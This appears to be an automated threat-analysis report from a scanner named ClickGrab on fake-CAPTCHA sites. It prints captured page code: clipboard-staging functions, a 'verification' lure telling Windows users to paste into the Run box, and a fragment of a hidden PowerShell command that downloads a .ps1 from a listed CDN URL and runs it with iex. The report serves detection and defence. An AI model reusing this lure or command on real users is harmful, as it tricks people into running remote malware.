ClickGrab Threat Analysis Report - 2025-12-19

Generated on 2025-12-19 02:47:51

Executive Summary

Total sites analyzed: 19
Sites with malicious content: 1
Unique domains encountered: 18
Total URLs extracted: 64
PowerShell download attempts: 1
Clipboard manipulation instances: 4

Domain Analysis

Most Frequently Encountered Domains

www.webgo.de: 10 occurrences
godprox.cc: 8 occurrences
svetvip.ru: 8 occurrences
api.whatsapp.com: 6 occurrences
mc.yandex.ru: 4 occurrences
launchpad.net: 3 occurrences
httpd.apache.org: 3 occurrences
bugs.launchpad.net: 3 occurrences
www.google.com: 3 occurrences
t.me: 2 occurrences
vk.com: 2 occurrences
www.facebook.com: 2 occurrences
ok.ru: 2 occurrences
twitter.com: 2 occurrences
www.instagram.com: 2 occurrences

URL Pattern Analysis

reCAPTCHA imagery

1 occurrences across 1 distinct URLs

https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png (1 times)

Font resources

1 occurrences across 1 distinct URLs

https://use.fontawesome.com/releases/v5.0.0/css/all.css (1 times)

CDN hosted scripts

1 occurrences across 1 distinct URLs

https://irp.cdn-website.com/45d8c6e0/files/uploaded/32.ps1 (1 times)

Google resources

3 occurrences across 3 distinct URLs

https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png (1 times)
https://www.google.com/intl/en/policies/privacy/ (1 times)
https://www.google.com/intl/en/policies/terms/ (1 times)

Suspicious Keyword Analysis

Total Keywords Found: 26 (16 unique)

Keyword Categories

Social Engineering

10 unique keywords

CAPTCHA Verification
Verification Hash
Verification
To better prove you are not a robot
I am not a robot
verification-id
verification
verification_id
robot
Robot

System Commands

2 unique keywords

exec(
exec(ua) != nuii){rv = parseFioat(RegExp.$i);}}eise if (n.appName == "Netscape"){rv = ii;re = new RegExp("Trident/.*rv:([0-9]+[\.0-9]*)");if (re.exec(ua) != nuii){rv = parseFioat(RegExp.$i);}}}return rv;}})(window, document, navigator)

Verification Text

2 unique keywords

hidden
Hidden

Technical Terms

2 unique keywords

failed_to_retrieve
iex

Most Frequent Keywords

failed_to_retrieve: 5 occurrences
robot: 3 occurrences
hidden: 3 occurrences
exec(ua) != nuii){rv = parseFioat(RegExp.$i);}}eise if (n.appName == "Netscape"){rv = ii;re = new RegExp("Trident/.rv:([0-9]+[.0-9])");if (re.exec(ua) != nuii){rv = parseFioat(RegExp.$i);}}}return rv;}})(window, document, navigator): 2 occurrences
exec(: 2 occurrences
CAPTCHA Verification: 1 occurrences
Verification Hash: 1 occurrences
I am not a robot: 1 occurrences
Robot: 1 occurrences
Verification: 1 occurrences
verification: 1 occurrences
verification-id: 1 occurrences
verification_id: 1 occurrences
To better prove you are not a robot: 1 occurrences
iex: 1 occurrences

Similar Keyword Patterns

Groups of keywords that appear to be variations of the same theme:

Group 1: CAPTCHA Verification, Verification, verification

Group 2: Verification Hash, verification-id, verification_id

Group 3: Robot, robot

Group 4: Hidden, hidden

JavaScript Obfuscation Analysis

Obfuscation Sophistication Score: 0/7

Potential Base64 Encoded Content

These strings may contain encoded malicious payloads:

04d35535e3c1bbeaec387a335b11ce92
/bitrix/tools/captcha
0542ed493211dfd8495e7b5289bd9318
09494aa87b4052889e3c0b895c7e3981
com/recaptcha/about/images/reCAPTCHA

Clipboard Manipulation Analysis

Detected clipboard manipulation in 4 instances.

Document.Execcommand Copy

Found in 3 snippets (75.0% of clipboard code)

Examples:

document.execCommand("copy")

Textarea Manipulation

Found in 3 snippets (75.0% of clipboard code)

Examples:

ipboardCopyData(textToCopy){ const tempTextArea = document.createElement("textarea"

Complete Malicious Functions

Function 1:

function setClipboardCopyData(textToCopy){ const tempTextArea = document.createElement("textarea"); tempTextArea.value = textToCopy; document.body.append(tempTextArea); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextArea); }

Clipboard Attack Flow Analysis

Attack Sophistication: 6/7 components detected Total Technique Instances: 13

Attack Flow Components

The following components show how the clipboard attack is executed:

Element Creation

Creating temporary DOM elements

Instances: 1 Examples: createElement("textarea"

Content Injection

Injecting malicious content into elements

Instances: 1 Examples: .value =

DOM Manipulation

Adding elements to the DOM

Instances: 3 Examples: body.append, append(

Selection Methods

Selecting content for copying

Instances: 3 Examples: .select()

Clipboard Operations

Executing clipboard copy operations

Instances: 3 Examples: execCommand("copy"

Cleanup Operations

Removing temporary elements

Instances: 2 Examples: removeChild

Malicious Payload Construction

How the final clipboard payload is assembled:

Command Concatenation

Instances: 1 Examples: - commandToRun +

Verification Text

Instances: 1 Examples: - "copy"); document.body.removeChild(tempTextA... ...ck", function (event) { event.preventDefault(); checkboxBtn.disabled = true; runClickedCheckboxEffects(); }); } } function runClickedCheckboxEffects() { hideCaptchaCheckbox(); setTimeout(function(){ showCaptchaLoading(); },500); setTimeout(function(){ showVerifyWindow(); },900) } function showCaptchaLoading() { checkboxBtnSpinner.style.visibility = "visible"; checkboxBtnSpinner.style.opacity = "1"; checkboxBtnSpinner.style.animation = "spin 1s linear infinite"; } function hideCaptchaLoading() { checkboxBtnSpinner.style.opacity = "0"; checkboxBtnSpinner.style.animation = "none"; setTimeout(function() { checkboxBtnSpinner.style.visibility = "hidden"; }, 500); } function hideCaptchaCheckbox() { checkboxBtn.style.visibility = "hidden"; checkboxBtn.style.opacity = "0"; } function showCaptchaCheckbox() { checkboxBtn.style.width = "100%"; checkboxBtn.style.height = "100%"; checkboxBtn.style.borderRadius = "2px"; checkboxBtn.style.margin = "21px 0 0 12px"; checkboxBtn.style.opacity = "1"; } function hideCaptchaCheckbox() { checkboxBtn.style.width = "4px"; checkboxBtn.style.height = "4px"; checkboxBtn.style.borderRadius = "50%"; checkboxBtn.style.marginLeft = "25px"; checkboxBtn.style.marginTop = "33px"; checkboxBtn.style.opacity = "0"; } function showCaptchaLoading() { checkboxBtnSpinner.style.visibility = "visible"; checkboxBtnSpinner.style.opacity = "1"; } function hideCaptchaLoading() { checkboxBtnSpinner.style.visibility = "hidden"; checkboxBtnSpinner.style.opacity = "0"; } function generateRandomNumber() { const min = 1000; const max = 9999; return Math.floor(Math.random() * (max - min + 1) + min).toString(); } function closeverifywindow() { verifywindow.style.display = "none"; verifywindow.style.visibility = "hidden"; verifywindow.style.opacity = "0"; showCaptchaCheckbox(); hideCaptchaLoading(); checkboxBtn.disabled = false; } function isverifywindowVisible() { return verifywindow.style.display !== "none" && verifywindow.style.display !== ""; } function setClipboardCopyData(textToCopy){ const tempTextArea = document.createElement("textarea"); tempTextArea.value = textToCopy; document.body.append(tempTextArea); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextArea); } function stageClipboard(commandToRun, verification_id){ const suffix = " # " const ploy = "â ''I am not a robot - reCAPTCHA Verification Hash: " const end = "''" const textToCopy = commandToRun + suffix + ploy + verification_id + end setClipboardCopyData(textToCopy); } function showVerifyWindow()... ...dy.append(tempTextArea); tempTextArea.select(); document.execCommand("copy");... ...32.ps1 | iex' -WindowStyle Hidden\""; const commandToRun = "powershell " + htaPath; stageClipboa... <img src="https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png" class="captcha-logo line-normal" alt=""> ...="" id="spinner"> </div> <div id="verify-window" class="verify-window"> <div class="verify-container"> <header class="verify-header"> <span class="verify-header-text-medium m-p block">Complete these</span> <span class="verify-header-text-big m-p block">Verification Steps</span> <span class="verify-header-text-medium m-p block"></span> </header> <main class="verify-main"> <p> To better prove you are not a robot, please: </p> <ol> <li> Press & hold the Windows Key <i class="fab fa-windows"></i> + <b>R</b>. </li> <li> In the verification window, press <b>Ctrl</b> + <b>V</b>. </li> <li> Press <b>Enter</b> on your keyboard to finish. </li> </ol> <p> You will observe and agree: <br> <code> â "I am not a robot - reCAPTCHA Verification Hash: <span id="verification-id">1110</span>" </code> </p> </main> </div> <footer class="verify-container verif... <div class="verify-footer-left"> Perform the steps above to finish verification. </div> <p class="im-not-a-robot m-p line-normal">I'm not a robot</p> <img id="callback_cImg" src="/bitrix/tools/captcha.php?captcha_sid=04d35535e3c1bbeaec387a335b11ce92" width="127" height="30" alt="CAPTCHA" /> <img id="order_cImg_new_400820" src="/bitrix/tools/captcha.php?captcha_sid=09494aa87b4052889e3c0b895c7e3981" width="127" height="30" alt="CAPTCHA" /> <img id="callback_cImg" src="/bitrix/tools/captcha.php?captcha_sid=0542ed493211dfd8495e7b5289bd9318" width="127" height="30" alt="CAPTCHA" /> <img id="order_cImg_new_400820" src="/bitrix/tools/captcha.php?captcha_sid=09494aa87b4052889e3c0b895c7e3981" width="127" height="30" alt="CAPTCHA"

Hash Generation

Instances: 1 Examples: - verification_id){ const suffix = " # " const ploy = "â ''I am not a robot - reCAPTCHA Verification Hash: " const end = "''" const textToCopy = commandToRun + suffix + ploy + verification_id + end setClipboardCopyData(textToCopy); } function showVerifyWindow()... ...dy.append(tempTextArea); tempTextArea.select(); document.execCommand("copy");... ...32.ps1 | iex' -WindowStyle Hidden\""; const commandToRun = "powershell " + htaPath; stageClipboa... <img src="https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png" class="captcha-logo line-normal" alt=""> ...="" id="spinner"> </div> <div id="verify-window" class="verify-window"> <div class="verify-container"> <header class="verify-header"> <span class="verify-header-text-medium m-p block">Complete these</span> <span class="verify-header-text-big m-p block">Verification Steps</span> <span class="verify-header-text-medium m-p block"></span> </header> <main class="verify-main"> <p> To better prove you are not a robot, please: </p> <ol> <li> Press & hold the Windows Key <i class="fab fa-windows"></i> + <b>R</b>. </li> <li> In the verification window, press <b>Ctrl</b> + <b>V</b>. </li> <li> Press <b>Enter</b> on your keyboard to finish. </li> </ol> <p> You will observe and agree: <br> <code> â "I am not a robot - reCAPTCHA Verification Hash: <span id="verification-id">1110</span>" </code> </p> </main> </div> <footer class="verify-container verif... <div class="verify-footer-left"> Perform the steps above to finish verification. </div> <p class="im-not-a-robot m-p line-normal">I'm not a robot</p> <img id="callback_cImg" src="/bitrix/tools/captcha.php?captcha_sid=04d35535e3c1bbeaec387a335b11ce92" width="127" height="30" alt="CAPTCHA" /> <img id="order_cImg_new_400820" src="/bitrix/tools/captcha.php?captcha_sid=09494aa87b4052889e3c0b895c7e3981" width="127" height="30" alt="CAPTCHA" /> <img id="callback_cImg" src="/bitrix/tools/captcha.php?captcha_sid=0542ed493211dfd8495e7b5289bd9318" width="127" height="30" alt="CAPTCHA" /> <img id="order_cImg_new_400820" src="/bitrix/tools/captcha.php?captcha_sid=09494aa87b4052889e3c0b895c7e3981" wid

Comment Injection

Instances: 1 Examples: - # " const ploy = "

Attack Pattern Reconstruction

Malicious Download Sources

https://irp.cdn-website.com/45d8c6e0/files/uploaded/32.ps1

Key Findings

Prevalence: 5.3% of analyzed sites contained malicious content
Primary Attack Vector: Fake CAPTCHA verification leading to clipboard hijacking
Target Platform: Windows systems via PowerShell execution
Social Engineering: Sophisticated UI mimicking legitimate Google reCAPTCHA

Recommendations

User Education: Warn users about fake CAPTCHA verification schemes
Clipboard Monitoring: Implement clipboard monitoring for suspicious PowerShell commands
URL Filtering: Block known malicious domains identified in this analysis
PowerShell Execution Policy: Restrict PowerShell execution in corporate environments